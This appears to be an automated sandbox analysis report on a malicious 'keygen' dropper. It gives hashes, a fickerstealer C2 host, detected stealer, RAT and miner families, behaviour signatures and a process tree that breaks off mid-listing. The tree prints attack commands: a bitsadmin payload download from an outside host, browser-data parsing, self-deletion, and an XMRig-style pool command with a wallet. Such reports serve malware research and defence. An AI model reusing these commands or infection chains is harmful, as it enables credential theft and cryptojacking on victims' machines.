Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 20:09

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2728
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2712
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2420
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2400
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1868
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1396
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1176
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1100
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1036
                    • C:\Users\Admin\AppData\Roaming\fvbtbaa
                      C:\Users\Admin\AppData\Roaming\fvbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4760
                    • C:\Users\Admin\AppData\Roaming\thbtbaa
                      C:\Users\Admin\AppData\Roaming\thbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3512
                      • C:\Users\Admin\AppData\Roaming\thbtbaa
                        C:\Users\Admin\AppData\Roaming\thbtbaa
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:3168
                    • C:\Users\Admin\AppData\Roaming\fvbtbaa
                      C:\Users\Admin\AppData\Roaming\fvbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4472
                    • C:\Users\Admin\AppData\Roaming\thbtbaa
                      C:\Users\Admin\AppData\Roaming\thbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1016
                      • C:\Users\Admin\AppData\Roaming\thbtbaa
                        C:\Users\Admin\AppData\Roaming\thbtbaa
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5460
                    • C:\Users\Admin\AppData\Roaming\fvbtbaa
                      C:\Users\Admin\AppData\Roaming\fvbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:3380
                    • C:\Users\Admin\AppData\Roaming\thbtbaa
                      C:\Users\Admin\AppData\Roaming\thbtbaa
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5028
                      • C:\Users\Admin\AppData\Roaming\thbtbaa
                        C:\Users\Admin\AppData\Roaming\thbtbaa
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:296
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:488
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:1016
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:200
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2208
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3356
                        • C:\Users\Admin\AppData\Local\Temp\is-184CP.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-184CP.tmp\Install.tmp" /SL5="$D007C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:900
                          • C:\Users\Admin\AppData\Local\Temp\is-QHKR5.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-QHKR5.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2688
                            • C:\Program Files\VideoLAN\WQOXNPDEGK\ultramediaburner.exe
                              "C:\Program Files\VideoLAN\WQOXNPDEGK\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2164
                              • C:\Users\Admin\AppData\Local\Temp\is-K3UIG.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-K3UIG.tmp\ultramediaburner.tmp" /SL5="$701CE,281924,62464,C:\Program Files\VideoLAN\WQOXNPDEGK\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:1216
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1800
                            • C:\Users\Admin\AppData\Local\Temp\ff-d3e00-5f0-4a1b1-038846bb36ae8\Vijewevohu.exe
                              "C:\Users\Admin\AppData\Local\Temp\ff-d3e00-5f0-4a1b1-038846bb36ae8\Vijewevohu.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2052
                            • C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Lyweletuzhae.exe
                              "C:\Users\Admin\AppData\Local\Temp\25-36f40-f1c-d698c-b3b26b4a385e1\Lyweletuzhae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2260
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\30t4x1lb.cdt\instEU.exe & exit
                                6⤵
                                  PID:4708
                                  • C:\Users\Admin\AppData\Local\Temp\30t4x1lb.cdt\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\30t4x1lb.cdt\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4904
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pipfpmgf.xjf\requête.exe & exit
                                  6⤵
                                    PID:4356
                                    • C:\Users\Admin\AppData\Local\Temp\pipfpmgf.xjf\requête.exe
                                      C:\Users\Admin\AppData\Local\Temp\pipfpmgf.xjf\requête.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4796
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:4652
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                          parse.exe -f json -b firefox
                                          9⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5712
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                          parse.exe -f json -b edge
                                          9⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4924
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                          parse.exe -f json -b chrome
                                          9⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4892
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5smx3q4y.muz\google-game.exe & exit
                                    6⤵
                                      PID:2772
                                      • C:\Users\Admin\AppData\Local\Temp\5smx3q4y.muz\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\5smx3q4y.muz\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:4340
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          PID:5440
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mlzooqhg.5ug\md1_1eaf.exe & exit
                                      6⤵
                                        PID:1924
                                        • C:\Users\Admin\AppData\Local\Temp\mlzooqhg.5ug\md1_1eaf.exe
                                          C:\Users\Admin\AppData\Local\Temp\mlzooqhg.5ug\md1_1eaf.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:5164
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1t04dfv.ewq\askinstall39.exe & exit
                                        6⤵
                                          PID:5220
                                          • C:\Users\Admin\AppData\Local\Temp\h1t04dfv.ewq\askinstall39.exe
                                            C:\Users\Admin\AppData\Local\Temp\h1t04dfv.ewq\askinstall39.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5376
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              8⤵
                                                PID:5728
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:6016
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iar4n5l1.lw1\y1.exe & exit
                                            6⤵
                                              PID:5688
                                              • C:\Users\Admin\AppData\Local\Temp\iar4n5l1.lw1\y1.exe
                                                C:\Users\Admin\AppData\Local\Temp\iar4n5l1.lw1\y1.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:6052
                                                • C:\Users\Admin\AppData\Local\Temp\yyAabJTLSD.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\yyAabJTLSD.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:764
                                                  • C:\Users\Admin\AppData\Roaming\1619474890484.exe
                                                    "C:\Users\Admin\AppData\Roaming\1619474890484.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619474890484.txt"
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:5920
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\yyAabJTLSD.exe"
                                                    9⤵
                                                      PID:3400
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 127.0.0.1 -n 3
                                                        10⤵
                                                        • Runs ping.exe
                                                        PID:5796
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iar4n5l1.lw1\y1.exe"
                                                    8⤵
                                                      PID:4388
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        9⤵
                                                          PID:6036
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /T 10 /NOBREAK
                                                          9⤵
                                                          • Delays execution with timeout.exe
                                                          PID:5584
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bnovstte.g1c\SunLabsPlayer.exe /S & exit
                                                    6⤵
                                                      PID:5144
                                                      • C:\Users\Admin\AppData\Local\Temp\bnovstte.g1c\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\bnovstte.g1c\SunLabsPlayer.exe /S
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:5524
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:5780
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:5192
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:632
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2304
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4200
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      9⤵
                                                                        PID:4828
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5788
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:5596
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        8⤵
                                                                        • Download via BitsAdmin
                                                                        PID:5344
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pgOoJ99SYVwji1SL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:4844
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pWg3lyghplhRrDY2 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5996
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:5652
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2416
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:1420
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:1680
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5240
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ADYtLcfIGYtW\ADYtLcfIGYtW.dll" ADYtLcfIGYtW
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1228
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ADYtLcfIGYtW\ADYtLcfIGYtW.dll" ADYtLcfIGYtW
                                                                                    9⤵
                                                                                    • Loads dropped DLL
                                                                                    • Drops file in System32 directory
                                                                                    PID:4600
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4956
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:4524
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:1728
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:5692
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr49CD.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5644
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            PID:4560
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gg522ddu.xoc\inst.exe & exit
                                                                                        6⤵
                                                                                          PID:4836
                                                                                          • C:\Users\Admin\AppData\Local\Temp\gg522ddu.xoc\inst.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\gg522ddu.xoc\inst.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5828
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2fz2e2rh.niq\GcleanerWW.exe /mixone & exit
                                                                                          6⤵
                                                                                            PID:5852
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hs5w2tpq.cj5\toolspab1.exe & exit
                                                                                            6⤵
                                                                                              PID:6036
                                                                                              • C:\Users\Admin\AppData\Local\Temp\hs5w2tpq.cj5\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\hs5w2tpq.cj5\toolspab1.exe
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:5316
                                                                                                • C:\Users\Admin\AppData\Local\Temp\hs5w2tpq.cj5\toolspab1.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\hs5w2tpq.cj5\toolspab1.exe
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:4496
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ilo21uy.d2g\app.exe /8-2222 & exit
                                                                                              6⤵
                                                                                                PID:3700
                                                                                                • C:\Users\Admin\AppData\Local\Temp\0ilo21uy.d2g\app.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\0ilo21uy.d2g\app.exe /8-2222
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5304
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0ilo21uy.d2g\app.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\0ilo21uy.d2g\app.exe" /8-2222
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:5352
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12140kca.nrk\c7ae36fa.exe & exit
                                                                                                6⤵
                                                                                                  PID:1056
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\12140kca.nrk\c7ae36fa.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\12140kca.nrk\c7ae36fa.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:1676
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4144
                                                                                          • C:\Users\Admin\AppData\Roaming\D670.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\D670.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5060
                                                                                            • C:\Users\Admin\AppData\Roaming\D670.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\D670.tmp.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks processor information in registry
                                                                                              PID:4192
                                                                                          • C:\Users\Admin\AppData\Roaming\D8B3.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\D8B3.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:2100
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w30249@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4708
                                                                                            • C:\Windows\system32\msiexec.exe
